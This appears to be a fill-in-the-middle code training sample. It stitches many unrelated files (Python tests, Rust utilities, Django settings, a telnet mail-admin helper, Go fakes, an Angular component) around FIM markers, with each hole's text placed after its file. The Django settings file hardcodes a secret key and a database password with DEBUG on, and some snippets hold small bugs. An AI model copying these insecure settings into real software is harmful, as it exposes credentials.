'related_publication_doi': '10.12345/fk2osf.io/hello/'
}
record.update(full_metadata, user=node.creator)
json_data = json.loads(record.serialize())
datacite_user_entered_fields = ['fundingReferences', 'resourceType', 'descriptions', 'relatedIdentifiers']
for field in datacite_user_entered_fields:
assert field in json_data.keys()
<|fim▁hole|> ) is None
def test_update_fails_with_incorrect_metadata(self, node, record):
# metadata not in schema fails
wrong_metadata = {
'favorite_schema': 'crossref'
}
with pytest.raises(jsonschema.ValidationError):
record.update(wrong_metadata, user=node.creator)
record.reload()
assert record.metadata == {}
assert node.logs.latest().action != NodeLog.FILE_METADATA_UPDATED
# metadata not matching schema pattern fails
wrong_doi = {
'related_publication_doi': 'whatever'
}
with pytest.raises(jsonschema.ValidationError):
record.update(wrong_doi, user=node.creator)
# resource_type not in specified options fails
wrong_resource_type = {
'resource_type': 'Scrap Book'
}
with pytest.raises(jsonschema.ValidationError):
record.update(wrong_resource_type, user=node.creator)
# funders but no funding agency
no_funding_agency_metadata = {
'funders': [
{'grant_number': 'Woooo'}
]
}
with pytest.raises(jsonschema.ValidationError):
record.update(no_funding_agency_metadata, user=node.creator)
# additional properties for funders fails
more_funders_metadata = {
'funders': [
{'funding_agency': 'Woop', 'there_it': 'is'}
]
}
with pytest.raises(jsonschema.ValidationError):
record.update(more_funders_metadata, user=node.creator)
def test_update_permissions(self, node, record, initial_metadata):
# Can't update with non-contributor auth
rando = AuthUserFactory()
with pytest.raises(PermissionsError):
record.update(initial_metadata, user=rando)
# Can't update with read-only auth
read_contrib = AuthUserFactory()
node.add_contributor(read_contrib, permissions=READ)
node.save()
with pytest.raises(PermissionsError):
record.update(initial_metadata, user=read_contrib)
# Can't update with no auth
with pytest.raises(PermissionsError):
record.update(initial_metadata, user=None)
def test_forked_file_has_metadata_copied(self, node, record, initial_metadata):
record.metadata = initial_metadata
record.save()
fork = node.fork_node(auth=Auth(node.creator))
forked_record = fork.files.first().records.first()
assert forked_record.metadata == record.metadata<|fim▁end|>
|
# validate record with all user entered metadata
assert jsonschema.validate(
inject_placeholder_doi(json_data),
record.schema.schema
|
<|file_name|>util.rs<|end_file_name|><|fim▁begin|>use std::io::{self, Result, Read, Write, ErrorKind};
//copy with length limiting
pub fn copy<R: Read, W: Write>(r: &mut R, w: &mut W, len_max: u64) -> io::Result<u64> {
let mut buf = [0; 1024];
let mut written : u64 = 0;
while written < len_max {
let len = match r.read(&mut buf) {
Ok(0) => return Ok(written),
Ok(len) => len,
Err(ref e) if e.kind() == ErrorKind::Interrupted => continue,<|fim▁hole|> try!(w.write_all(&buf[..len]));
written += len as u64;
}
else {
let to_write : usize = len_max as usize - written as usize;
let to_write = if to_write > len {len} else {to_write}; //required?
try!(w.write_all(&buf[..to_write]));
written += to_write as u64;
}
}
Ok(written)
}<|fim▁end|>
|
Err(e) => return Err(e),
};
if (written+len as u64) < len_max {
|
<|file_name|>vizquery.py<|end_file_name|><|fim▁begin|>from chimera.util.votable import VOTable
from httplib import HTTPConnection
import tempfile
import os
import urllib
class VizQuery(object):
"""
Queries A catalog in Vizier
within a given radius or box of the zenith
"""
def __init__(self):
self.args = {}
self.args["-mime"] = "xml"
self.columns = None
def useCat(self, catName):
"""
@param catName: the catalog's name in Vizier
@type catName: str
Simply sets the catalog's name
"""
self.args["-source"] = catName
def useColumns(self, columns, sortBy, reverse=False):
"""
@param columns: list of catalog's columns to use
@type columns: list
@param sortBy: define which column to sort by
@type sortBy: str
@param reverse: decide to reverse sort @type reverse: bool
Define which columns will be fetched and which column will be used
for sorting.
"""
self.columns = columns.split(",")
self.args["-out"] = columns
if reverse:
self.args["-sort"] = "-" + sortBy
else:
self.args["-sort"] = sortBy
def sortBy(self, column):
"""
One sets here which column to sort by
@param column: name of column to sort by
@type column: str
"""
def constrainColumns(self, columns):
"""
Use this to add constraints to any of the columns
@param columns: list of dictionaries {COLUMN:condition}
@type columns: list
"""
self.args.update(columns)
def useTarget(self, center, radius=None, box=None):
"""
@param center: center of search in catalog
@type center: L{Position}
@param radius: radius of search
@type radius: float
@param box: box size, if you want a square use an integer
if you want a rectangle use a tuple (ww,hh)
@type box: int | tuple
"""
self.args["-c"] = str(center)
self.args["-c.eq"] = "J2000"
if radius:
self.args["-c.rd"] = radius
elif box:
try:
self.args["-c.bd"] = "=%fx%f" % radius
except:
self.args["-c.bd"] = radius
else:
raise TypeError("You must specify either radius or box size")
def find(self, limit=9999):
"""
@param limit: Number of stars to return from Vizier
@type limit: int
"""
assert "-c.rd" in self.args or "-c.bd" in self.args, "No target selected, use useTarget method first."
self.args["-out.max"] = limit
results = tempfile.NamedTemporaryFile(mode='w+',
prefix="chimera.vizquery",
dir=tempfile.gettempdir())
# query the catalog in Vizier's database
conn = HTTPConnection("webviz.u-strasbg.fr")
s = urllib.urlencode(self.args)
conn.request("POST", "/viz-bin/votable", s)
resp = conn.getresponse()
ret = resp.read()
f = open(results.name, "w")
f.write(ret)<|fim▁hole|>
votable = VOTable(results.name)
for linha in votable.getDataRows():
v = [c.getContent() for c in linha.getNodeList()]
obj.append(dict(zip(self.columns, v)))
return obj<|fim▁end|>
|
f.close()
obj = []
|
<|file_name|>main.rs<|end_file_name|><|fim▁begin|>use std::fs;
use std::io;
use std::io::Read;
use clap::{App, Arg};
mod llvm_runner;
mod optimizer;
mod parser;
mod runner;
mod structs;
#[cfg(feature = "llvm")]
use llvm_runner::LlvmState;
use parser::parse;
use runner::State;
use structs::OpStream;
fn main() {
let app = App::new("BrainRust")
.arg(
Arg::with_name("dry-run")
.short("n")
.long("dry-run")
.help("Don't actually execute the program"),
)
.arg(
Arg::with_name("no-optimize")
.short("0")
.long("no-optimize")
.help("Don't optimize before running"),
)
.arg(Arg::with_name("FILES").min_values(1).required(true));
<|fim▁hole|> .long("llvm")
.help("Execute using LLVM JIT"),
);
let matches = app.get_matches();
let dry_run = matches.is_present("dryrun");
let no_optimize = matches.is_present("no-optimize");
let use_llvm = cfg!(feature = "llvm") && matches.is_present("llvm");
for filename in matches.values_of("FILES").unwrap() {
let buffer = match read_file(filename) {
Ok(v) => v,
Err(e) => {
eprintln!("Error while reading {}: {}", filename, e);
continue;
}
};
let ops = match parse(&buffer) {
Ok(v) => v,
Err(e) => {
eprintln!("Error while parsing {}: {}", filename, e);
continue;
}
};
let mut opstream = OpStream { ops };
if !(use_llvm || no_optimize) {
opstream.optimize();
}
if !dry_run {
if use_llvm {
#[cfg(feature = "llvm")]
LlvmState::new(&mut io::stdin(), &mut io::stdout(), !no_optimize)
.run(opstream.get());
} else {
State::new(&mut io::stdin(), &mut io::stdout()).run(opstream.get());
};
}
}
}
fn read_file(filename: &str) -> Result<Vec<u8>, io::Error> {
let mut buffer = Vec::new();
fs::File::open(filename)?.read_to_end(&mut buffer)?;
Ok(buffer)
}<|fim▁end|>
|
#[cfg(feature = "llvm")]
let app = app.arg(
Arg::with_name("llvm")
.short("l")
|
<|file_name|>setup.py<|end_file_name|><|fim▁begin|>#!/usr/bin/env python
# -*- coding: utf-8 -*-
from setuptools import setup, find_packages
from codecs import open
from os import path
here = path.abspath(path.dirname(__file__))
with open(path.join(here, 'README.rst'), encoding='utf-8') as f:
readme = f.read()
requirements = [
'prov>=1.5.3',
]
test_requirements = [
'pydot>=1.2.0'
]
setup(
name='voprov',
version='0.0.2',
description='A library for IVOA Provenance Data Model supporting PROV-JSON, '
'PROV-XML and PROV-N',
long_description=readme,
author='Jean-Francois Sornay',
author_email='[email protected]',
url='https://github.com/sanguillon/voprov/',
packages=find_packages(),
include_package_data=True,
install_requires=requirements,
extras_require={
'dot': ['pydot>=1.2.0'],
},
license="MIT",
zip_safe=False,
keywords=[
'provenance', 'graph', 'model', 'VOPROV', 'provenance-dm', 'PROVENANCE-DM', 'PROV-JSON', 'JSON',
'PROV-XML', 'PROV-N'
],
classifiers=[
'Development Status :: 4 - Beta',
'Intended Audience :: Developers',
'Intended Audience :: Information Technology',
'Intended Audience :: Science/Research',<|fim▁hole|> 'Operating System :: OS Independent',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: 3.7',
'Programming Language :: Python :: 3.8',
'Topic :: Scientific/Engineering :: Information Analysis',
],
tests_require=test_requirements,
python_requires='>=2',
)<|fim▁end|>
|
'License :: OSI Approved :: MIT License',
'Natural Language :: French',
|
<|file_name|>settings.py<|end_file_name|><|fim▁begin|>"""
Django settings for ghost_project project.
For more information on this file, see
https://docs.djangoproject.com/en/1.6/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.6/ref/settings/
"""
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
import os
BASE_DIR = os.path.dirname(os.path.dirname(__file__))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.6/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '#r@x_l8*u-tnrtc@er=1-z9ng7an7c%@#bue8cnsdn3ogud79)'
# SECURITY WARNING: don't run with debug turned on in production!
ALLOWED_HOSTS = ('localhost', '127.0.0.1')
DEBUG = True
TEMPLATE_DEBUG = True
# Application definition
INSTALLED_APPS = (
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'feedbacks',
'users',
'utils',
)
MIDDLEWARE_CLASSES = (
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',<|fim▁hole|>)
ROOT_URLCONF = 'default.urls'
WSGI_APPLICATION = 'default.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.6/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
'USER': 'ghost',
'PASSWORD': 'geekattitude',
}
}
# Internationalization
# https://docs.djangoproject.com/en/1.6/topics/i18n/
LANGUAGE_CODE = 'us-EN'
TIME_ZONE = 'CET'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.6/howto/static-files/
STATIC_URL = '/assets/'
# templates and files
TEMPLATE_DIRS = ('assets/tpl')
STATICFILES_DIRS = (os.path.abspath(os.path.join(BASE_DIR, 'assets')),)
# others
APPEND_SLASH = True<|fim▁end|>
|
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
|
<|file_name|>james.py<|end_file_name|><|fim▁begin|>from telnetlib import Telnet
class James:
def __init__(self, app):
self.app = app
def ensure_user_exists(self, username, password):
james_config = self.app.config['james']
session = James.Session(james_config['host'], james_config['port'], james_config['username'], james_config['password'])
if session.is_user_registered(username):
session.reset_password(username, password)
else:
session.create_user(username, password)
session.quit()<|fim▁hole|>
class Session:
def __init__(self, host, port, username, password):
self.telnet = Telnet(host, port, 10)
self.read_until("login id:")
self.write(username + '\n')
self.read_until("Password:")
self.write(password + '\n')
self.read_until("Welcome root. HELP for a list of commands")
def is_user_registered(self, username):
self.write("verify %s\n" % username)
res = self.telnet.expect([b"exists", b"does not exist"])
return res[0] == 0
def create_user(self, username, password):
self.write("adduser %s %s\n" % (username, password))
self.read_until("User %s added" % username)
def reset_password(self, username, password):
self.write("setpassword %s %s\n" % (username, password))
self.read_until("Password for %s reset" % username)
def quit(self):
self.write("quit\n")
def read_until(self, text):
self.telnet.read_until(text.encode("ascii"), 5)
def write(self, text):
self.telnet.write(text.encode("ascii"))<|fim▁end|>
| |
<|file_name|>fakeenv_test.go<|end_file_name|><|fim▁begin|>// Copyright 2014 Canonical Ltd.
// Licensed under the AGPLv3, see LICENCE file for details.
package model_test
import (
"errors"
gc "gopkg.in/check.v1"
"gopkg.in/juju/names.v2"
"github.com/juju/juju/api"
jujucloud "github.com/juju/juju/cloud"
"github.com/juju/juju/environs/config"
"github.com/juju/juju/testing"
)
// ModelConfig related fake environment for testing.
type fakeEnvSuite struct {
testing.FakeJujuXDGDataHomeSuite
fake *fakeEnvAPI
}
func (s *fakeEnvSuite) SetUpTest(c *gc.C) {
s.FakeJujuXDGDataHomeSuite.SetUpTest(c)
s.fake = &fakeEnvAPI{
values: map[string]interface{}{
"name": "test-model",
"special": "special value",
"running": true,
},
defaults: config.ConfigValues{
"attr": {Value: "foo", Source: "default"},
"attr2": {Value: "bar", Source: "controller"},
"attr3": {Value: "baz", Source: "region"},
},
}
}
type fakeEnvAPI struct {
values map[string]interface{}
cloud, region string
defaults config.ConfigValues
err error
keys []string
resetKeys []string
}
func (f *fakeEnvAPI) Close() error {
return nil
}
func (f *fakeEnvAPI) ModelGet() (map[string]interface{}, error) {
return f.values, nil
}
func (f *fakeEnvAPI) ModelGetWithMetadata() (config.ConfigValues, error) {
result := make(config.ConfigValues)
for name, val := range f.values {
result[name] = config.ConfigValue{Value: val, Source: "model"}
}
return result, nil
}
func (f *fakeEnvAPI) ModelSet(config map[string]interface{}) error {
f.values = config
return f.err
}
func (f *fakeEnvAPI) ModelUnset(keys ...string) error {
f.resetKeys = keys
return f.err
}
// ModelDefaults related fake environment for testing.
type fakeModelDefaultEnvSuite struct {
testing.FakeJujuXDGDataHomeSuite
fakeAPIRoot *fakeAPIConnection
fakeDefaultsAPI *fakeModelDefaultsAPI
fakeCloudAPI *fakeCloudAPI
}
func (s *fakeModelDefaultEnvSuite) SetUpTest(c *gc.C) {
s.FakeJujuXDGDataHomeSuite.SetUpTest(c)
s.fakeAPIRoot = &fakeAPIConnection{}
s.fakeDefaultsAPI = &fakeModelDefaultsAPI{
values: map[string]interface{}{
"name": "test-model",
"special": "special value",
"running": true,
},
defaults: config.ModelDefaultAttributes{
"attr": {Default: "foo"},
"attr2": {
Controller: "bar",
Regions: []config.RegionDefaultValue{{
"dummy-region",
"dummy-value",
}, {
"another-region",
"another-value",
}}},
},
}
s.fakeCloudAPI = &fakeCloudAPI{
clouds: map[string]jujucloud.Cloud{
"cloud-dummy": {
Type: "dummy-cloud",
Regions: []jujucloud.Region{
{Name: "dummy-region"},
{Name: "another-region"},
},
},
},
}
}
type fakeAPIConnection struct {<|fim▁hole|>
func (*fakeAPIConnection) Close() error {
return nil
}
type fakeModelDefaultsAPI struct {
values map[string]interface{}
cloud, region string
defaults config.ModelDefaultAttributes
err error
keys []string
}
func (f *fakeModelDefaultsAPI) Close() error {
return nil
}
func (f *fakeModelDefaultsAPI) ModelGet() (map[string]interface{}, error) {
return f.values, nil
}
func (f *fakeModelDefaultsAPI) ModelDefaults() (config.ModelDefaultAttributes, error) {
return f.defaults, nil
}
func (f *fakeModelDefaultsAPI) SetModelDefaults(cloud, region string, cfg map[string]interface{}) error {
if f.err != nil {
return f.err
}
f.cloud = cloud
f.region = region
for name, val := range cfg {
f.defaults[name] = config.AttributeDefaultValues{Controller: val}
}
return nil
}
func (f *fakeModelDefaultsAPI) UnsetModelDefaults(cloud, region string, keys ...string) error {
if f.err != nil {
return f.err
}
f.cloud = cloud
f.region = region
for _, key := range keys {
delete(f.defaults, key)
}
return nil
}
func (f *fakeModelDefaultsAPI) ModelSet(config map[string]interface{}) error {
f.values = config
return f.err
}
func (f *fakeModelDefaultsAPI) ModelUnset(keys ...string) error {
f.keys = keys
return f.err
}
type fakeCloudAPI struct {
clouds map[string]jujucloud.Cloud
}
func (f *fakeCloudAPI) Close() error { return nil }
func (f *fakeCloudAPI) DefaultCloud() (names.CloudTag, error) {
return names.NewCloudTag("dummy"), nil
}
func (f *fakeCloudAPI) Cloud(name names.CloudTag) (jujucloud.Cloud, error) {
var (
c jujucloud.Cloud
ok bool
)
if c, ok = f.clouds[name.String()]; !ok {
return jujucloud.Cloud{}, errors.New("Unknown cloud")
}
return c, nil
}<|fim▁end|>
|
api.Connection
}
|
<|file_name|>el.js<|end_file_name|><|fim▁begin|>/*
Load a block from github.io.
Accepts a url as a parameter which can include url parameters e.g. https://megjlow.github.io/extension2.js?name=SUN&ip=10.0.0.1
*/
new (function() {
var ext = this;
var descriptor = {
blocks: [
[' ', 'Load extension block ip %s', 'loadBlock', 'ip', 'ip'],
[' ', 'Load extension block name %s', 'loadBlock', 'name', 'name'],
],
url: 'http://www.warwick.ac.uk/tilesfortales'
};
ext._shutdown = function() {};
ext._getStatus = function() {
return {status: 2, msg: 'Device connected'}
};
ext.loadBlock = function(ip) {
ScratchExtensions.loadExternalJS("https://megjlow.github.io/socket.js?ip=" + ip);
};
ext.loadBlockName = function(name) {
ScratchExtensions.loadExternalJS("https://megjlow.github.io/socket.js?name=" + name);
};
ScratchExtensions.register("extensionloader", descriptor, ext);
<|fim▁hole|><|fim▁end|>
|
});
|
<|file_name|>transaction.component.js<|end_file_name|><|fim▁begin|>"use strict";
var __decorate = (this && this.__decorate) || function (decorators, target, key, desc) {
var c = arguments.length, r = c < 3 ? target : desc === null ? desc = Object.getOwnPropertyDescriptor(target, key) : desc, d;
if (typeof Reflect === "object" && typeof Reflect.decorate === "function") r = Reflect.decorate(decorators, target, key, desc);
else for (var i = decorators.length - 1; i >= 0; i--) if (d = decorators[i]) r = (c < 3 ? d(r) : c > 3 ? d(target, key, r) : d(target, key)) || r;
return c > 3 && r && Object.defineProperty(target, key, r), r;
};
var __metadata = (this && this.__metadata) || function (k, v) {
if (typeof Reflect === "object" && typeof Reflect.metadata === "function") return Reflect.metadata(k, v);
};
var core_1 = require('@angular/core');
var helper_service_1 = require('../../services/helper/helper.service');
var transaction_service_1 = require('../../services/transaction/transaction.service');
var router_deprecated_1 = require('@angular/router-deprecated');
var GetEntity_service_1 = require('../../services/GetEntity/GetEntity.service');
var transactionline_component_1 = require('../transactionline/transactionline.component');
var main_1 = require('ag-grid-ng2/main');
var TransactionComponent = (function () {
function TransactionComponent(transactionService, router) {
var _this = this;
this.transactionService = transactionService;
this.router = router;
this.getTransactionSuccess = true;
this.ok = new core_1.EventEmitter();
this.transaction = {
comment: '',
debtorID: -1,
entityID: -1,
transactionID: -1,
transactionLineArray: [],
bankAccountID: -1,
chequeNumber: -1,
sTransactionDate: '',
transactionType: 0
};
this.transactionVisible = false;
this.calculateTransactionTotal = function () {
var i;
var total = 0;
for (i = 0; i < _this.transaction.transactionLineArray.length; i = i + 1) {
if (_this.transaction.transactionLineArray[i].debit) {
total += _this.transaction.transactionLineArray[i].amount;
}
else {
total -= _this.transaction.transactionLineArray[i].amount;
}
}
_this.transactionTotal = helper_service_1.HelperService.formatMoney(total);
};
this.newTransaction = function (ledgerAccounts, transactionType, bankAccounts) {
_this.selectedTransactionLineIndex = -1;
var newTransactionThis = _this;
if (helper_service_1.HelperService.tokenIsValid()) {
_this.ledgerAccounts = ledgerAccounts;
_this.bankAccounts = bankAccounts;
switch (transactionType) {
case 0:
_this.titleTransaction = 'Add Cheque';<|fim▁hole|> _this.titleTransaction = 'Add Deposit';
_this.bankAccountDisabled = false;
break;
case 4:
_this.titleTransaction = 'Add General Journal';
_this.bankAccountDisabled = true;
break;
}
var EntityId = GetEntity_service_1.GetEntityService.getInstance().getEntityId();
if (EntityId === -1) {
_this.router.navigate(['Entities']);
}
else {
_this.transaction = {
comment: '',
debtorID: -1,
entityID: EntityId,
transactionID: -1,
transactionLineArray: [],
bankAccountID: -1,
chequeNumber: -1,
sTransactionDate: helper_service_1.HelperService.formatDateForJSon(new Date()),
transactionType: transactionType
};
_this.gridOptions.api.setRowData(_this.transaction.transactionLineArray);
_this.selectedTransactionLineIndex = -1;
}
_this.editTransaction = false;
_this.getTransactionSuccess = true;
_this.calculateTransactionTotal();
_this.transactionVisible = true;
}
else {
_this.router.navigate(['Login']);
}
};
this.getTransaction = function (transactionID, ledgerAccounts, bankAccounts, copyTransaction) {
var getTransactionThis = _this;
getTransactionThis.editTransaction = !copyTransaction;
if (helper_service_1.HelperService.tokenIsValid()) {
_this.ledgerAccounts = ledgerAccounts;
_this.bankAccounts = bankAccounts;
var EntityId = GetEntity_service_1.GetEntityService.getInstance().getEntityId();
_this.transactionService.getTransaction(transactionID, EntityId).subscribe(onGetTransaction, logTransactionError);
}
else {
_this.router.navigate(['Login']);
}
function onGetTransaction(transaction) {
getTransactionThis.transaction = transaction;
getTransactionThis.gridOptions.api.setRowData(transaction.transactionLineArray);
getTransactionThis.gridOptions.api.sizeColumnsToFit();
this.selectedTransactionLineIndex = -1;
getTransactionThis.getTransactionSuccess = true;
getTransactionThis.calculateTransactionTotal();
getTransactionThis.transactionVisible = true;
var verb;
if (copyTransaction) {
verb = 'Copy ';
}
else {
verb = 'Edit ';
}
switch (transaction.transactionType) {
case 0:
getTransactionThis.titleTransaction = verb + 'Cheque';
getTransactionThis.bankAccountDisabled = false;
break;
case 1:
getTransactionThis.titleTransaction = verb + ' Deposit';
getTransactionThis.bankAccountDisabled = false;
break;
case 4:
getTransactionThis.titleTransaction = verb + ' General Journal';
getTransactionThis.bankAccountDisabled = true;
break;
case 5:
getTransactionThis.titleTransaction = verb + ' Invoice';
getTransactionThis.bankAccountDisabled = true;
break;
case 6:
getTransactionThis.titleTransaction = verb + ' Pay Invoice';
getTransactionThis.bankAccountDisabled = true;
break;
}
}
function logTransactionError() {
console.log('getTransaction Error');
getTransactionThis.getTransactionSuccess = false;
}
};
this.cancelTransaction = function () {
_this.transactionVisible = false;
};
this.okClicked = function () {
var okClickedThis = _this;
if (_this.editTransaction) {
if (helper_service_1.HelperService.tokenIsValid()) {
_this.transactionService.updateTransaction(_this.transaction).subscribe(updateTransactionSuccess, logError, complete);
_this.transactionVisible = false;
}
else {
_this.router.navigate(['Login']);
}
}
else {
if (helper_service_1.HelperService.tokenIsValid()) {
_this.transactionService.saveNewTransaction(_this.transaction).subscribe(updateTransactionSuccess, logError, complete);
}
else {
_this.router.navigate(['Login']);
}
}
function logError(obj) {
console.log(obj);
console.log(JSON.stringify(obj));
}
function complete() {
console.log('transaction complete');
}
function updateTransactionSuccess(response) {
console.log('updateTransactionSuccess');
okClickedThis.transactionVisible = false;
okClickedThis.ok.emit('');
}
};
this.selectedTransactionLineIndex = -1;
this.deleteTransactionLine = function () {
if (_this.selectedTransactionLineIndex === -1) {
alert('Please choose a line to delete');
}
else {
_this.transaction.transactionLineArray.splice(_this.selectedTransactionLineIndex, 1);
_this.gridOptions.api.setRowData(_this.transaction.transactionLineArray);
_this.selectedTransactionLineIndex = -1;
}
};
this.saveTransactionLine = function (savededTransactionLine) {
if (_this.bEditTransactionLine) {
_this.transaction.transactionLineArray[_this.selectedTransactionLineIndex] = savededTransactionLine;
}
else {
_this.transaction.transactionLineArray.push(savededTransactionLine);
}
;
_this.gridOptions.api.setRowData(_this.transaction.transactionLineArray);
_this.selectedTransactionLineIndex = -1;
_this.calculateTransactionTotal();
};
this.newTransactionLine = function () {
_this.bEditTransactionLine = false;
_this.transactionLineComponent.newTransactionLine(_this.ledgerAccounts, _this.transaction.transactionType);
};
this.columnDefs = [
{ headerName: 'Ledger Account', field: 'ledgerAccountName' },
{ headerName: 'Amount', field: 'amount', cellClass: 'rightJustify', cellRenderer: function (params) { return helper_service_1.HelperService.formatMoney(Number(params.value)); } },
{ headerName: 'Debit', field: 'debit' },
{ headerName: 'Comment', field: 'comment' }
];
this.onRowClicked = function (params) {
_this.selectedTransactionLineIndex = params.node.id;
};
this.onRowDoubleClicked = function (params) {
var selectedTransactionLine = params.data;
_this.bEditTransactionLine = true;
_this.transactionLineComponent.displayTransactionline(selectedTransactionLine, _this.ledgerAccounts, _this.transaction.transactionType);
};
this.gridOptions = helper_service_1.HelperService.getGridOptions(this.columnDefs, this.onRowClicked, this.onRowDoubleClicked);
console.log('constructor transactionComponent');
}
TransactionComponent.prototype.ngOnInit = function () {
if (helper_service_1.HelperService.tokenIsValid() === false) {
this.router.navigate(['Login']);
}
};
__decorate([
core_1.Output(),
__metadata('design:type', core_1.EventEmitter)
], TransactionComponent.prototype, "ok", void 0);
__decorate([
core_1.ViewChild(transactionline_component_1.TransactionLineComponent),
__metadata('design:type', transactionline_component_1.TransactionLineComponent)
], TransactionComponent.prototype, "transactionLineComponent", void 0);
TransactionComponent = __decorate([
core_1.Component({
selector: 'transactionModal',
templateUrl: 'src/app/components/transaction/transaction.component.html',
styles: ['.modalSolsofVisible {display: block;}'],
providers: [transaction_service_1.TransactionService],
directives: [main_1.AgGridNg2, transactionline_component_1.TransactionLineComponent]
}),
__metadata('design:paramtypes', [transaction_service_1.TransactionService, router_deprecated_1.Router])
], TransactionComponent);
return TransactionComponent;
}());
exports.TransactionComponent = TransactionComponent;
//# sourceMappingURL=Transaction.component.js.map<|fim▁end|>
|
_this.bankAccountDisabled = false;
break;
case 1:
|
<|file_name|>main.rs<|end_file_name|><|fim▁begin|>// --- Day 7: Internet Protocol Version 7 ---
//
// While snooping around the local network of EBHQ, you compile a list of IP addresses (they're IPv7, of course; IPv6 is much too limited). You'd like to figure out which IPs support TLS (transport-layer snooping).
//
// An IP supports TLS if it has an Autonomous Bridge Bypass Annotation, or ABBA. An ABBA is any four-character sequence which consists of a pair of two different characters followed by the reverse of that pair, such as xyyx or abba. However, the IP also must not have an ABBA within any hypernet sequences, which are contained by square brackets.
//
// For example:
//
// abba[mnop]qrst supports TLS (abba outside square brackets).
// abcd[bddb]xyyx does not support TLS (bddb is within square brackets, even though xyyx is outside square brackets).<|fim▁hole|>// aaaa[qwer]tyui does not support TLS (aaaa is invalid; the interior characters must be different).
// ioxxoj[asdfgh]zxcvbn supports TLS (oxxo is outside square brackets, even though it's within a larger string).
// How many IPs in your puzzle input support TLS?
//
// --- Part Two ---
//
// You would also like to know which IPs support SSL (super-secret listening).
//
// An IP supports SSL if it has an Area-Broadcast Accessor, or ABA, anywhere in the supernet sequences (outside any square bracketed sections), and a corresponding Byte Allocation Block, or BAB, anywhere in the hypernet sequences. An ABA is any three-character sequence which consists of the same character twice with a different character between them, such as xyx or aba. A corresponding BAB is the same characters but in reversed positions: yxy and bab, respectively.
//
// For example:
//
// aba[bab]xyz supports SSL (aba outside square brackets with corresponding bab within square brackets).
// xyx[xyx]xyx does not support SSL (xyx, but no corresponding yxy).
// aaa[kek]eke supports SSL (eke in supernet with corresponding kek in hypernet; the aaa sequence is not related, because the interior character must be different).
// zazbz[bzb]cdb supports SSL (zaz has no corresponding aza, but zbz has a corresponding bzb, even though zaz and zbz overlap).
//
// How many IPs in your puzzle input support SSL?
//
extern crate regex;
#[macro_use]
extern crate lazy_static;
mod ip_address;
mod part_a_validator;
mod part_b_validator;
use std::io::prelude::*;
use std::fs::File;
use ip_address::IPAddress;
use part_a_validator::PartAValidator;
use part_b_validator::PartBValidator;
fn main() {
// read input from file
let mut f = File::open("input.txt").unwrap();
let mut input = String::new();
f.read_to_string(&mut input).ok();
// parse lines to IPAddress objects
let addresses: Vec<IPAddress> = input.lines().map(|l| l.parse().unwrap()).collect();
// figure out answer A
let part_a_validator = PartAValidator{};
let answer_a: Vec<&IPAddress> = addresses.iter().filter(|a| a.is_valid(&part_a_validator)).collect();
println!("[PART A] answer: {}", answer_a.len());
// figure out answer B
let part_b_validator = PartBValidator{};
let answer_b: Vec<&IPAddress> = addresses.iter().filter(|a| a.is_valid(&part_b_validator)).collect();
println!("[PART B] answer: {}", answer_b.len());
}<|fim▁end|>
| |
<|file_name|>mat.rs<|end_file_name|><|fim▁begin|>use num::Float;
use std::fmt;
use std::ops::{Add, Sub, Mul};
use numvec::Vec3f;
/// The type of matrix elements.
pub type Scalar = f32;
/// A 4x4 matrix type stored in column-major order for interoperability with
/// OpenGL.
///
/// Supports the creation of isometries and projections in homogenous
/// coordinates. In terms of operations, only transposition and multiplication
/// are currently supported (and not super-efficiently implemented).
///
/// _Note:_ The 16 elements are stored in place, so copies are not cheap.
#[repr(packed)]
#[repr(C)]
#[derive(Copy, Clone)]
pub struct Mat4 {
data: [Scalar; 16]
}
impl Mat4 {
pub fn new(m00: Scalar, m01: Scalar, m02: Scalar, m03: Scalar,
m10: Scalar, m11: Scalar, m12: Scalar, m13: Scalar,
m20: Scalar, m21: Scalar, m22: Scalar, m23: Scalar,
m30: Scalar, m31: Scalar, m32: Scalar, m33: Scalar) -> Mat4 {
// In my mind vectors are columns, hence matrices need to be transposed
// to the OpenGL memory order.
Mat4 { data: [m00, m10, m20, m30, m01, m11, m21, m31,
m02, m12, m22, m32, m03, m13, m23, m33] }
}
pub fn new_identity() -> Mat4 {
Mat4::new(1.0, 0.0, 0.0, 0.0,
0.0, 1.0, 0.0, 0.0,
0.0, 0.0, 1.0, 0.0,
0.0, 0.0, 0.0, 1.0)
}
/// Creates a perspective projection matrix from.
///
/// The parameters are:
/// * `fov_degrees` - Horizontal field of view.
/// * `aspect_ratio` - Ratio between width and height of the view.
/// * `near`, `far` - The Z coordinate of the near and far planes.
pub fn new_perspective(fov_degrees: Scalar, aspect_ratio: Scalar,
near: Scalar, far: Scalar) -> Mat4 {
let fov = (3.1415926538 * fov_degrees) / 180.0;
let f = 1.0 / (fov * 0.5).tan();
Mat4::new(
f / aspect_ratio, 0.0, 0.0, 0.0,
0.0, f, 0.0, 0.0,
0.0, 0.0, (far + near) / (near - far), 2.0*far*near / (near - far),
0.0, 0.0, -1.0, 0.0)
}
/// Creates a matrix which rotates points by `angle_radians` around `axis`.
pub fn new_axis_rotation(axis: &Vec3f, angle_radians: Scalar) -> Mat4 {
let ca = angle_radians.cos();
let sa = angle_radians.sin();
let nca = 1.0 - ca;
let u = axis;
Mat4::new(
ca + u.x*u.x*nca, u.x*u.y*nca - u.z*sa, u.x*u.z*nca + u.y*sa, 0.0,
